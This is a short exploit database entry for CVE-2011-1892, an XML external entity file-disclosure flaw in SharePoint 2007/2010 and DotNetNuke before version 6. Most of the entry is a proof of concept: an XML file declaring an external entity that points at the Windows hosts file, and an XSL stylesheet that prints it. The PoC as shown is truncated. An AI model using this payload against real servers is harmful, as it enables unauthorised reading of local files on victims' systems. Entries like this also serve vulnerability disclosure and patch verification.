File disclosure via XEE in SharePoint 2007/2010 and DotNetNuke < 6

ID 1337DAY-ID-16953
Type zdt
Reporter Nicolas Gregoire
Modified 2011-09-19T00:00:00


Exploit for windows platform in category web applications

                                            Exploit Title: File disclosure via XEE in SharePoint and DotNetNuke
Date: September 15, 2011
Author: Nicolas Gregoire
Version: SharePoint 2007 / 2010, DotNetNuke < 6
CVE : CVE-2011-1892
poc filename: xee.xml
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
poc filename: xee.xsl
<xsl:stylesheet version="1.0" xmlns:xsl="">
        <xsl:template match="/">
                <xsl:value-of select="doc"/>

# [2018-01-05]  #